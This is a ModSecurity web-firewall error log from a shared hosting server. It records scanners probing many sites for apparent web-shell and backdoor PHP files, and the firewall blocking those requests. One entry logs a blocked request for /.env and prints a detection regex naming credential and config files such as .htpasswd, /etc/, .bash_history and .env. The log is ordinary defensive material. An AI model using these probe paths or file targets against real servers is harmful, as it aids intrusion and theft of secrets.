[Tue May 26 16:35:09.509595 2026] [security2:error] [pid 808625:tid 808836] [client 20.151.117.104:22331] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/simple.php"] [unique_id "ahV-ZTEl_SBaWibfDmphEgAAAFE"]
[Tue May 26 16:35:09.556861 2026] [security2:error] [pid 808625:tid 808849] [client 130.131.224.225:65081] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/inputs.php"] [unique_id "ahV-ZTEl_SBaWibfDmphEwAAAF4"]
[Tue May 26 16:35:09.556965 2026] [security2:error] [pid 808625:tid 808849] [client 130.131.224.225:65081] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/inputs.php"] [unique_id "ahV-ZTEl_SBaWibfDmphEwAAAF4"]
[Tue May 26 16:35:09.653269 2026] [security2:error] [pid 808625:tid 808772] [client 20.151.117.104:2148] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/bgymj.php"] [unique_id "ahV-ZTEl_SBaWibfDmphFAAAABE"]
[Tue May 26 16:35:09.653413 2026] [security2:error] [pid 808625:tid 808772] [client 20.151.117.104:2148] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/bgymj.php"] [unique_id "ahV-ZTEl_SBaWibfDmphFAAAABE"]
[Tue May 26 16:35:09.705674 2026] [security2:error] [pid 808625:tid 808823] [client 130.131.224.225:63872] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/samll.php"] [unique_id "ahV-ZTEl_SBaWibfDmphFQAAAEQ"]
[Tue May 26 16:35:09.705821 2026] [security2:error] [pid 808625:tid 808823] [client 130.131.224.225:63872] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/samll.php"] [unique_id "ahV-ZTEl_SBaWibfDmphFQAAAEQ"]
[Tue May 26 16:35:09.798804 2026] [security2:error] [pid 808625:tid 808767] [client 20.151.117.104:2117] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/twenty/login.php"] [unique_id "ahV-ZTEl_SBaWibfDmphFgAAAAw"]
[Tue May 26 16:35:09.798934 2026] [security2:error] [pid 808625:tid 808767] [client 20.151.117.104:2117] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/twenty/login.php"] [unique_id "ahV-ZTEl_SBaWibfDmphFgAAAAw"]
[Tue May 26 16:35:09.874091 2026] [security2:error] [pid 808625:tid 808842] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-ZDEl_SBaWibfDmpg-gAAAFc"]
[Tue May 26 16:35:09.942633 2026] [security2:error] [pid 808625:tid 808867] [client 20.151.117.104:8442] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/404.php"] [unique_id "ahV-ZTEl_SBaWibfDmphGgAAAHA"]
[Tue May 26 16:35:09.942738 2026] [security2:error] [pid 808625:tid 808867] [client 20.151.117.104:8442] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/404.php"] [unique_id "ahV-ZTEl_SBaWibfDmphGgAAAHA"]
[Tue May 26 16:35:09.947972 2026] [security2:error] [pid 808625:tid 808759] [client 130.131.224.225:63969] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-admin/css/colors/blue/file.php"] [unique_id "ahV-ZTEl_SBaWibfDmphGwAAAAQ"]
[Tue May 26 16:35:09.948044 2026] [security2:error] [pid 808625:tid 808759] [client 130.131.224.225:63969] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-admin/css/colors/blue/file.php"] [unique_id "ahV-ZTEl_SBaWibfDmphGwAAAAQ"]
[Tue May 26 16:35:10.086192 2026] [security2:error] [pid 808625:tid 808830] [client 20.151.117.104:9781] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/file3.php"] [unique_id "ahV-ZjEl_SBaWibfDmphHAAAAEs"]
[Tue May 26 16:35:10.086280 2026] [security2:error] [pid 808625:tid 808830] [client 20.151.117.104:9781] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/file3.php"] [unique_id "ahV-ZjEl_SBaWibfDmphHAAAAEs"]
[Tue May 26 16:35:10.148029 2026] [security2:error] [pid 808625:tid 808858] [client 130.131.224.225:64553] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/favicon.php"] [unique_id "ahV-ZjEl_SBaWibfDmphHQAAAGc"]
[Tue May 26 16:35:10.148134 2026] [security2:error] [pid 808625:tid 808858] [client 130.131.224.225:64553] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/favicon.php"] [unique_id "ahV-ZjEl_SBaWibfDmphHQAAAGc"]
[Tue May 26 16:35:10.230360 2026] [security2:error] [pid 808625:tid 808850] [client 20.151.117.104:2140] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/wp-mail.php"] [unique_id "ahV-ZjEl_SBaWibfDmphHgAAAF8"]
[Tue May 26 16:35:10.230501 2026] [security2:error] [pid 808625:tid 808850] [client 20.151.117.104:2140] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/wp-mail.php"] [unique_id "ahV-ZjEl_SBaWibfDmphHgAAAF8"]
[Tue May 26 16:35:10.300444 2026] [security2:error] [pid 808625:tid 808787] [client 130.131.224.225:63962] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/aboutc.php"] [unique_id "ahV-ZjEl_SBaWibfDmphIgAAACA"]
[Tue May 26 16:35:10.300558 2026] [security2:error] [pid 808625:tid 808787] [client 130.131.224.225:63962] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/aboutc.php"] [unique_id "ahV-ZjEl_SBaWibfDmphIgAAACA"]
[Tue May 26 16:35:10.373191 2026] [security2:error] [pid 808625:tid 808786] [client 20.151.117.104:31225] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/about.php"] [unique_id "ahV-ZjEl_SBaWibfDmphIwAAAB8"]
[Tue May 26 16:35:10.373333 2026] [security2:error] [pid 808625:tid 808786] [client 20.151.117.104:31225] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/about.php"] [unique_id "ahV-ZjEl_SBaWibfDmphIwAAAB8"]
[Tue May 26 16:35:10.416864 2026] [security2:error] [pid 808625:tid 808876] [client 176.65.139.237:31586] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "usai.glorodavionics.com"] [uri "/.env"] [unique_id "ahV-ZjEl_SBaWibfDmphJwAAAHk"]
[Tue May 26 16:35:10.449743 2026] [security2:error] [pid 808625:tid 808792] [client 130.131.224.225:63993] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-load.php"] [unique_id "ahV-ZjEl_SBaWibfDmphKAAAACU"]
[Tue May 26 16:35:10.449853 2026] [security2:error] [pid 808625:tid 808792] [client 130.131.224.225:63993] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-load.php"] [unique_id "ahV-ZjEl_SBaWibfDmphKAAAACU"]
[Tue May 26 16:35:10.524827 2026] [security2:error] [pid 808625:tid 808863] [client 20.151.117.104:59380] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/wp.php"] [unique_id "ahV-ZjEl_SBaWibfDmphLAAAAGw"]
[Tue May 26 16:35:10.524947 2026] [security2:error] [pid 808625:tid 808863] [client 20.151.117.104:59380] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/wp.php"] [unique_id "ahV-ZjEl_SBaWibfDmphLAAAAGw"]
[Tue May 26 16:35:10.629804 2026] [security2:error] [pid 808625:tid 808812] [client 130.131.224.225:63945] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/aevly.php"] [unique_id "ahV-ZjEl_SBaWibfDmphMwAAADk"]
[Tue May 26 16:35:10.629889 2026] [security2:error] [pid 808625:tid 808812] [client 130.131.224.225:63945] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/aevly.php"] [unique_id "ahV-ZjEl_SBaWibfDmphMwAAADk"]
[Tue May 26 16:35:10.669244 2026] [security2:error] [pid 808625:tid 808773] [client 20.151.117.104:35829] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/.dj/index.php"] [unique_id "ahV-ZjEl_SBaWibfDmphNAAAABI"]
[Tue May 26 16:35:10.669381 2026] [security2:error] [pid 808625:tid 808773] [client 20.151.117.104:35829] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/.dj/index.php"] [unique_id "ahV-ZjEl_SBaWibfDmphNAAAABI"]
[Tue May 26 16:35:10.813156 2026] [security2:error] [pid 808625:tid 808825] [client 20.151.117.104:34832] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/adminfuns.php"] [unique_id "ahV-ZjEl_SBaWibfDmphNQAAAEY"]
[Tue May 26 16:35:10.813288 2026] [security2:error] [pid 808625:tid 808825] [client 20.151.117.104:34832] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/adminfuns.php"] [unique_id "ahV-ZjEl_SBaWibfDmphNQAAAEY"]
[Tue May 26 16:35:10.911050 2026] [security2:error] [pid 808625:tid 808865] [client 130.131.224.225:64629] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/atkno.php"] [unique_id "ahV-ZjEl_SBaWibfDmphNgAAAG4"]
[Tue May 26 16:35:10.911159 2026] [security2:error] [pid 808625:tid 808865] [client 130.131.224.225:64629] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/atkno.php"] [unique_id "ahV-ZjEl_SBaWibfDmphNgAAAG4"]
[Tue May 26 16:35:10.959265 2026] [security2:error] [pid 808625:tid 808782] [client 20.151.117.104:34855] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/php8.php"] [unique_id "ahV-ZjEl_SBaWibfDmphNwAAABs"]
[Tue May 26 16:35:10.959372 2026] [security2:error] [pid 808625:tid 808782] [client 20.151.117.104:34855] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/php8.php"] [unique_id "ahV-ZjEl_SBaWibfDmphNwAAABs"]
[Tue May 26 16:35:11.051593 2026] [security2:error] [pid 808625:tid 808843] [client 130.131.224.225:62696] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/mini.php"] [unique_id "ahV-ZzEl_SBaWibfDmphOAAAAFg"]
[Tue May 26 16:35:11.051751 2026] [security2:error] [pid 808625:tid 808843] [client 130.131.224.225:62696] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/mini.php"] [unique_id "ahV-ZzEl_SBaWibfDmphOAAAAFg"]
[Tue May 26 16:35:11.102412 2026] [security2:error] [pid 808625:tid 808841] [client 20.151.117.104:9758] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/classwithtostring.php"] [unique_id "ahV-ZzEl_SBaWibfDmphOQAAAFY"]
[Tue May 26 16:35:11.102535 2026] [security2:error] [pid 808625:tid 808841] [client 20.151.117.104:9758] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/classwithtostring.php"] [unique_id "ahV-ZzEl_SBaWibfDmphOQAAAFY"]
[Tue May 26 16:35:11.176892 2026] [security2:error] [pid 808625:tid 808772] [client 114.119.133.194:27529] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahV-ZzEl_SBaWibfDmphPgAAABE"], referer: http://haddingtonwines.com/cart?remove_item=4e2ecebbfafe27a7c00e0462fad0873a
[Tue May 26 16:35:11.196772 2026] [security2:error] [pid 808625:tid 808857] [client 130.131.224.225:63310] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-thi.php"] [unique_id "ahV-ZzEl_SBaWibfDmphQQAAAGY"]
[Tue May 26 16:35:11.196915 2026] [security2:error] [pid 808625:tid 808857] [client 130.131.224.225:63310] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-thi.php"] [unique_id "ahV-ZzEl_SBaWibfDmphQQAAAGY"]
[Tue May 26 16:35:11.251917 2026] [security2:error] [pid 808625:tid 808767] [client 20.151.117.104:22286] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/info.php"] [unique_id "ahV-ZzEl_SBaWibfDmphRQAAAAw"]
[Tue May 26 16:35:11.252041 2026] [security2:error] [pid 808625:tid 808767] [client 20.151.117.104:22286] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/info.php"] [unique_id "ahV-ZzEl_SBaWibfDmphRQAAAAw"]
[Tue May 26 16:35:11.371744 2026] [security2:error] [pid 808625:tid 808760] [client 130.131.224.225:63341] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-kd4xalrg7m.php"] [unique_id "ahV-ZzEl_SBaWibfDmphRgAAAAU"]
[Tue May 26 16:35:11.371854 2026] [security2:error] [pid 808625:tid 808760] [client 130.131.224.225:63341] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-kd4xalrg7m.php"] [unique_id "ahV-ZzEl_SBaWibfDmphRgAAAAU"]
[Tue May 26 16:35:11.408199 2026] [security2:error] [pid 808625:tid 808864] [client 20.151.117.104:2154] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/ioxi-o.php"] [unique_id "ahV-ZzEl_SBaWibfDmphRwAAAG0"]
[Tue May 26 16:35:11.408304 2026] [security2:error] [pid 808625:tid 808864] [client 20.151.117.104:2154] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/ioxi-o.php"] [unique_id "ahV-ZzEl_SBaWibfDmphRwAAAG0"]
[Tue May 26 16:35:11.533891 2026] [security2:error] [pid 808625:tid 808789] [client 130.131.224.225:63304] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/amax.php"] [unique_id "ahV-ZzEl_SBaWibfDmphSwAAACI"]
[Tue May 26 16:35:11.533997 2026] [security2:error] [pid 808625:tid 808789] [client 130.131.224.225:63304] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/amax.php"] [unique_id "ahV-ZzEl_SBaWibfDmphSwAAACI"]
[Tue May 26 16:35:11.558753 2026] [security2:error] [pid 808625:tid 808830] [client 20.151.117.104:31271] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/011i.php"] [unique_id "ahV-ZzEl_SBaWibfDmphTAAAAEs"]
[Tue May 26 16:35:11.558866 2026] [security2:error] [pid 808625:tid 808830] [client 20.151.117.104:31271] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/011i.php"] [unique_id "ahV-ZzEl_SBaWibfDmphTAAAAEs"]
[Tue May 26 16:35:11.690160 2026] [security2:error] [pid 808625:tid 808770] [client 130.131.224.225:65059] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wehrman.php"] [unique_id "ahV-ZzEl_SBaWibfDmphUwAAAA8"]
[Tue May 26 16:35:11.690276 2026] [security2:error] [pid 808625:tid 808770] [client 130.131.224.225:65059] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wehrman.php"] [unique_id "ahV-ZzEl_SBaWibfDmphUwAAAA8"]
[Tue May 26 16:35:11.709412 2026] [security2:error] [pid 808625:tid 808878] [client 20.151.117.104:59375] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/edit.php"] [unique_id "ahV-ZzEl_SBaWibfDmphVAAAAHs"]
[Tue May 26 16:35:11.709516 2026] [security2:error] [pid 808625:tid 808878] [client 20.151.117.104:59375] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "freeworkzone.com.md-74.webhostbox.net"] [uri "/edit.php"] [unique_id "ahV-ZzEl_SBaWibfDmphVAAAAHs"]
